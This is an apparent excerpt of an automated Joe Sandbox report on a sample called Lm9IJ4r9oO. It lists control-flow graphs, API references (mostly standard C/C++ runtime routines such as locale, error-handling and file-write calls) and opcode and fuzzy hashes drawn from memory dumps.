control_flow_graph 944 684a48-684a59 945 684a5b 944->945 946 684a5d-684a68 944->946 945->946 947 684a6a-684a87 call 67eb76 946->947 948 684a8c-684a9f 946->948 960 684d71-684d74 947->960 950 684aa1-684ac1 call 684d75 948->950 951 684af4-684af7 948->951 962 684acb-684ad7 call 6930a0 950->962 963 684ac3-684ac6 950->963 952 684af9 951->952 953 684b03-684b34 951->953 956 684afb-684afd 952->956 957 684aff-684b02 952->957 958 684b54 953->958 959 684b36-684b44 953->959 956->953 956->957 957->953 966 684b57-684b5c 958->966 964 684b4b-684b52 959->964 965 684b46-684b49 959->965 976 684add-684aef 962->976 977 684d6e 962->977 967 684d70 963->967 964->966 965->966 969 684b5e-684b60 966->969 970 684b62-684b69 966->970 967->960 971 684b85-684b92 969->971 972 684b78-684b83 970->972 973 684b6b-684b75 call 67e720 970->973 978 684b9d-684bad 971->978 979 684b94-684b97 971->979 972->971 973->972 976->977 977->967 982 684bb0-684bc0 978->982 979->978 981 684c5c-684c5e 979->981 985 684c70-684c76 981->985 986 684c60-684c6e call 679d00 981->986 983 684c12-684c27 call 685288 982->983 984 684bc2-684be6 call 692e80 982->984 983->985 996 684c29-684c2f 983->996 998 684be8 984->998 999 684beb-684c0e 984->999 988 684c78 985->988 989 684c7a-684ca5 call 692e80 985->989 986->985 988->989 1001 684cb1-684cba 989->1001 1002 684ca7 989->1002 1000 684c32-684c37 996->1000 998->999 999->982 1003 684c10 999->1003 1004 684c39-684c3c 1000->1004 1005 684c3e-684c41 1000->1005 1008 684cbb-684cc7 1001->1008 1006 684ca9-684cab 1002->1006 1007 684cad-684caf 1002->1007 1003->981 1004->1005 1009 684c43-684c49 1004->1009 1005->1000 1006->1001 1006->1007 1007->1008 1010 684ccd-684cd2 1008->1010 1011 684d63-684d6a 1008->1011 1012 684c59 1009->1012 1013 684c4b-684c4e 1009->1013 1014 684cd8-684d04 call 692ea0 call 692f50 1010->1014 1015 684cd4-684cd6 1010->1015 1011->977 1012->981 1016 684c50 1013->1016 1017 684c53-684c57 1013->1017 1018 684d06-684d08 1014->1018 1023 684d11-684d36 call 692ea0 call 692f50 1014->1023 1015->1014 1015->1018 1016->1017 1017->981 1018->1011 1020 684d0a 1018->1020 1022 684d0c-684d0f 1020->1022 1020->1023 1022->1023 1025 684d38-684d3a 1022->1025 1023->1025 1032 684d43-684d61 call 692ea0 call 692f50 1023->1032 1025->1011 1029 684d3c 1025->1029 1031 684d3e-684d41 1029->1031 1029->1032 1031->1011 1031->1032 1032->1011
APIs
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 4a1e7a88781f3fc4a05ea266e86924434fd1885396d90a927bf9f7f5f6868df7
• Instruction ID: 76f5f08fa42b4e2f96744690daf28ad15206d84e96f5c6a48ee5325762a65175
• Opcode Fuzzy Hash: 4a1e7a88781f3fc4a05ea266e86924434fd1885396d90a927bf9f7f5f6868df7
• Instruction Fuzzy Hash: F1B16832A01257AFDB25AF64CC81BEE7BABEF55310F144255E514AF382DB74D901C7A0

Control-flow Graph
control_flow_graph 1038 671bc0-671c00 1039 671c06-671c09 1038->1039 1040 671d5e-671d76 1038->1040 1039->1040 1041 671c0f-671c2b call 67829a 1039->1041 1044 671c2d-671c32 1041->1044 1045 671c39 1041->1045 1046 671c34-671c37 1044->1046 1047 671c3e-671c84 call 6761c5 1044->1047 1045->1047 1046->1047 1050 671d77-671da5 call 67638c call 677be3 1047->1050 1051 671c8a-671cd1 call 676616 call 677b78 call 676661 1047->1051 1062 671cd3-671cd9 call 67e8b9 1051->1062 1063 671cdc-671ce8 1051->1063 1062->1063 1064 671cf3-671cff 1063->1064 1065 671cea-671cf0 call 67e8b9 1063->1065 1068 671d01-671d07 call 67e8b9 1064->1068 1069 671d0a-671d16 1064->1069 1065->1064 1068->1069 1073 671d21-671d2d 1069->1073 1074 671d18-671d1e call 67e8b9 1069->1074 1077 671d2f-671d35 call 67e8b9 1073->1077 1078 671d38-671d44 1073->1078 1074->1073 1077->1078 1079 671d46-671d4c call 67e8b9 1078->1079 1080 671d4f-671d59 call 67621d 1078->1080 1079->1080 1080->1040
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00671C43
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00671C8F
• __Getctype.LIBCPMT ref: 00671CA8
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00671CC4
• std::_Lockit::~_Lockit.LIBCPMT ref: 00671D59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 1840309910-1405518554
• Opcode ID: 033d2a6aeb030c7dbca79bf922c9e1b859cf1d5630cc322db5eaacef5143098f
• Instruction ID: 794ce591ec3889a66fc2efa693a06bf3b7a0bacabbc3223280c7aed8203d0705
• Opcode Fuzzy Hash: 033d2a6aeb030c7dbca79bf922c9e1b859cf1d5630cc322db5eaacef5143098f
• Instruction Fuzzy Hash: 9A5162B1D002489BEF10DFE8D9457DEBBB9AF15710F148169EC08AB381E775A909CB92

Control-flow Graph
control_flow_graph 1486 6746f0-674743 call 6761c5 1489 674745-674754 call 6761c5 1486->1489 1490 674774-674784 1486->1490 1498 674766-67476e call 67621d 1489->1498 1499 674756-674761 1489->1499 1492 674786-67478e 1490->1492 1493 674792-674794 1490->1493 1495 6747f0-674815 call 67621d call 678287 1492->1495 1496 674790 1492->1496 1497 674797-67479b 1493->1497 1496->1497 1501 6747b0-6747b2 1497->1501 1502 67479d-6747a5 call 676512 1497->1502 1498->1490 1499->1498 1501->1495 1503 6747b4-6747b6 1501->1503 1502->1503 1513 6747a7-6747ad 1502->1513 1509 6747bc-6747ce call 671bc0 1503->1509 1510 6747b8-6747ba 1503->1510 1516 674816-67481b call 671880 1509->1516 1517 6747d0-6747ea call 6764e6 1509->1517 1510->1495 1513->1501 1517->1495
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00674726
• std::_Lockit::_Lockit.LIBCPMT ref: 00674749
• std::_Lockit::~_Lockit.LIBCPMT ref: 00674769
• std::_Facet_Register.LIBCPMT ref: 006747DB
• std::_Lockit::~_Lockit.LIBCPMT ref: 006747F3
• Concurrency::cancel_current_task.LIBCPMT ref: 00674816
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2081738530-0
• Opcode ID: 42bdb23a76052465410884bc63588e49707a1b4f064ca996919811e428ca577d
• Instruction ID: 8da18ff2459b6ff486c9317ec0ed0d19f356f33484d7bb11165ec652438b213c
• Opcode Fuzzy Hash: 42bdb23a76052465410884bc63588e49707a1b4f064ca996919811e428ca577d
• Instruction Fuzzy Hash: 30419C71D00219DFCB18EF94D845BAEB7B6FB09720F14825DE81967341EB34AA00CB95

Control-flow Graph
control_flow_graph 1523 67b71a-67b721 1524 67b726-67b741 GetLastError call 67c923 1523->1524 1525 67b723-67b725 1523->1525 1528 67b743-67b745 1524->1528 1529 67b75a-67b75c 1524->1529 1530 67b7a0-67b7ab SetLastError 1528->1530 1531 67b747-67b758 call 67c95e 1528->1531 1529->1530 1531->1529 1534 67b75e-67b76e call 67ca63 1531->1534 1537 67b782-67b792 call 67c95e 1534->1537 1538 67b770-67b780 call 67c95e 1534->1538 1544 67b798-67b79f call 67e8b9 1537->1544 1538->1537 1543 67b794-67b796 1538->1543 1543->1544 1544->1530
APIs
• GetLastError.KERNEL32(?,?,0067B711,006796EB,00678FED), ref: 0067B728
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0067B736
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0067B74F
• SetLastError.KERNEL32(00000000,0067B711,006796EB,00678FED), ref: 0067B7A1
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: fc005bbfe35b2f0dfea7f05b49fda5e5389f9c5cf2049e2181bb637d7ab48d4f
• Instruction ID: 7a527035139fe4ecd22e2607eeb13b4d983a748ef416e304a67dd4e93c91add9
• Opcode Fuzzy Hash: fc005bbfe35b2f0dfea7f05b49fda5e5389f9c5cf2049e2181bb637d7ab48d4f
• Instruction Fuzzy Hash: E4014C331082115EEBA81B79BC85766275FEB41776320A23FF21CC11E1EF124C115388

Control-flow Graph
control_flow_graph 1547 676824-67685e call 6787ba call 6761c5 call 671aa0 call 671b70 1556 6768a3-6768b2 call 67621d call 678797 1547->1556 1557 676860-676862 1547->1557 1559 676864-676866 1557->1559 1560 676868-676879 call 676df0 1557->1560 1559->1556 1565 6768b3-6768b8 call 671880 1560->1565 1566 67687b-67689d call 6764e6 1560->1566 1566->1556
APIs
• __EH_prolog3.LIBCMT ref: 0067682B
• std::_Lockit::_Lockit.LIBCPMT ref: 00676835
  • Part of subcall function 00671AA0: std::_Lockit::_Lockit.LIBCPMT ref: 00671ABD
  • Part of subcall function 00671AA0: std::_Lockit::~_Lockit.LIBCPMT ref: 00671AD9
• codecvt.LIBCPMT ref: 0067686F
• std::_Facet_Register.LIBCPMT ref: 00676886
• std::_Lockit::~_Lockit.LIBCPMT ref: 006768A6
• Concurrency::cancel_current_task.LIBCPMT ref: 006768B3
Memory Dump Source
• Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
• Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 2133458128-0
                                                                                                  • Opcode ID: 715c63a3ac604d7c5e896c1dc0bea67df5c5e7b5b552f4e5620cf144cc4979b4
                                                                                                  • Instruction ID: 72679b33a9fe2a8e3277437a51816c70224ef2e9e948a91f7df8987b5000189d
                                                                                                  • Opcode Fuzzy Hash: 715c63a3ac604d7c5e896c1dc0bea67df5c5e7b5b552f4e5620cf144cc4979b4
                                                                                                  • Instruction Fuzzy Hash: 2701C4319005158BCB49EFA4C8056FD7B63AF41710F24840EF819AB391DF709E018BA5
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EBD99D41,?,?,00000000,00693ADE,000000FF,?,00682265,00682349,?,00682239,00000000), ref: 006822BE
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006822D0
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00693ADE,000000FF,?,00682265,00682349,?,00682239,00000000), ref: 006822F2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 56f01e495b8629d8f2439b85ab1b2b74fa773b1fa33db2f3f157a72222e8a0f8
                                                                                                  • Instruction ID: 30357d02753a3eca5812ee74edc0f17569f14bfd85e2a74c7f1d0b55a9a64ca9
                                                                                                  • Opcode Fuzzy Hash: 56f01e495b8629d8f2439b85ab1b2b74fa773b1fa33db2f3f157a72222e8a0f8
                                                                                                  • Instruction Fuzzy Hash: DC016735554615ABDB119F50CC15FEEB7BEFB04711F050627E811E2A90DB749901CB94
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0068A2A3
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0068A36C
                                                                                                  • __freea.LIBCMT ref: 0068A3D3
                                                                                                    • Part of subcall function 00684839: HeapAlloc.KERNEL32(00000000,0068B908,?,?,0068B908,00000220,?,?,?), ref: 0068486B
                                                                                                  • __freea.LIBCMT ref: 0068A3E6
                                                                                                  • __freea.LIBCMT ref: 0068A3F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096550386-0
                                                                                                  • Opcode ID: c753c1b5017c5e64a879f0237593d79723ff5b009c88dd4537e0f432712482a9
                                                                                                  • Instruction ID: 1afd8e2d2b3dc9e38c607f40fd135db72e2fdc27c52b19cb2c83faea7e7d4130
                                                                                                  • Opcode Fuzzy Hash: c753c1b5017c5e64a879f0237593d79723ff5b009c88dd4537e0f432712482a9
                                                                                                  • Instruction Fuzzy Hash: 0B51B272610206AFFB207EE4CC85EEB76ABEF44710F29022EFC04D6201EA75DD518762
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 156189095-0
                                                                                                  • Opcode ID: b8fce9f3a134dca40cb7ca1f3c4a5386c67cc68e458ab50270c73be0be0c79bb
                                                                                                  • Instruction ID: 29c4128958215f698e18b038814cae24676a78231c5a499226f639fd0f902d56
                                                                                                  • Opcode Fuzzy Hash: b8fce9f3a134dca40cb7ca1f3c4a5386c67cc68e458ab50270c73be0be0c79bb
                                                                                                  • Instruction Fuzzy Hash: 6401DF75A00A109BDB4AEF20C849ABC7B77BF84340B15800DF81A57381CF346E46CF89
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0067209F
                                                                                                    • Part of subcall function 006796FD: RaiseException.KERNEL32(E06D7363,00000001,00000003,0067125C,?,?,?,?,0067125C,?,0069DFCC), ref: 0067975D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 3109751735-1866435925
                                                                                                  • Opcode ID: 899c950e3bc70fbb904d2f7bcd87e18dd7a3b6a4d27dd6dbf2993709a60e0109
                                                                                                  • Instruction ID: e7e03be48d71753f69dd2cdedc275f4c3e599495887be0577dbab8c8fb1d8270
                                                                                                  • Opcode Fuzzy Hash: 899c950e3bc70fbb904d2f7bcd87e18dd7a3b6a4d27dd6dbf2993709a60e0109
                                                                                                  • Instruction Fuzzy Hash: 0B1105B29003056BCB10DF68D801E96B7DEEF15310F04C52AF9589B641FB70A901CBA4
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0067C813,00000000,?,006A05B4,?,?,?,0067C9B6,00000004,InitializeCriticalSectionEx,00695BE8,InitializeCriticalSectionEx), ref: 0067C86F
                                                                                                  • GetLastError.KERNEL32(?,0067C813,00000000,?,006A05B4,?,?,?,0067C9B6,00000004,InitializeCriticalSectionEx,00695BE8,InitializeCriticalSectionEx,00000000,?,0067C76D), ref: 0067C879
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0067C8A1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: dd7e09d443bfea220b1d0d7da02d8d48e69b71b69090310c990c16890378e91b
                                                                                                  • Instruction ID: a509ac1fd1fda06e8ad9f5cd678631b24d96b592fd4408ba055b1a527ad37596
                                                                                                  • Opcode Fuzzy Hash: dd7e09d443bfea220b1d0d7da02d8d48e69b71b69090310c990c16890378e91b
                                                                                                  • Instruction Fuzzy Hash: 5EE04F70284205FBEF202FA0EC06F5D3E5BAB40B65F108135FB0DA95E1EB619821D696
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(EBD99D41,00000000,00000000,00000000), ref: 00687CED
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00687F3F
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00687F85
                                                                                                  • GetLastError.KERNEL32 ref: 00688028
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: 724b35e8c504feb8ad11906e19a0ddc771f34d76fdd5a4231ae9c4c46684bca3
                                                                                                  • Instruction ID: 8e1be8d23dfbad2ad1179fd89d227bcb1b32623a4bd094684b99f48d0b666c23
                                                                                                  • Opcode Fuzzy Hash: 724b35e8c504feb8ad11906e19a0ddc771f34d76fdd5a4231ae9c4c46684bca3
                                                                                                  • Instruction Fuzzy Hash: F1D17D75D042489FDF15DFE8C8809EDBBB6EF49300F24466AE515EB351D630E946CB50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 5ebafab0230d0b2a89a31f5056a77c4b2708b06bd76471f37a20f44ec4efff47
                                                                                                  • Instruction ID: 72b305a8176ad120690155cd51b08e83daaa3b88ec22692e90db8a629265a779
                                                                                                  • Opcode Fuzzy Hash: 5ebafab0230d0b2a89a31f5056a77c4b2708b06bd76471f37a20f44ec4efff47
                                                                                                  • Instruction Fuzzy Hash: 7F510472A042069FEB289F10C841BBA77AAFF45711F14D12DEA2D97391E731ED81CB94
                                                                                                  APIs
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • GetLastError.KERNEL32 ref: 0068AE84
                                                                                                  • __dosmaperr.LIBCMT ref: 0068AE8B
                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0068AEC5
                                                                                                  • __dosmaperr.LIBCMT ref: 0068AECC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 55252d30285dfeea8ffd00cf73b5eb400ac5887814cb1f425ab5331b8f6336b1
                                                                                                  • Instruction ID: 292b2cd75f384fe7e944b0c4e5cce37cd188913c0e0f6c77994272b2ef69500a
                                                                                                  • Opcode Fuzzy Hash: 55252d30285dfeea8ffd00cf73b5eb400ac5887814cb1f425ab5331b8f6336b1
                                                                                                  • Instruction Fuzzy Hash: 1221AF31600605AFAB60BFA5888596BB7AFEF443647108F1AFD1997210D730EC51ABA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7132251cafbd2fc9657a2257c55eb89a4e59b8f626d98c9ab4477339fbfd8eb2
                                                                                                  • Instruction ID: 0be33bbb444567925f79b12743801e0bad3c31168bbd99dfad2f55971efbb0ed
                                                                                                  • Opcode Fuzzy Hash: 7132251cafbd2fc9657a2257c55eb89a4e59b8f626d98c9ab4477339fbfd8eb2
                                                                                                  • Instruction Fuzzy Hash: CA21A131204205AF9B60BFA19C80DAA77EFAF463647108B19F9159B651DB31EC4287A0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0068BDC9
                                                                                                    • Part of subcall function 0068AA63: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000001,?,00000000,?,?,?,006855AD,?,00000000,?), ref: 0068AAC4
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0068BE01
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0068BE21
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
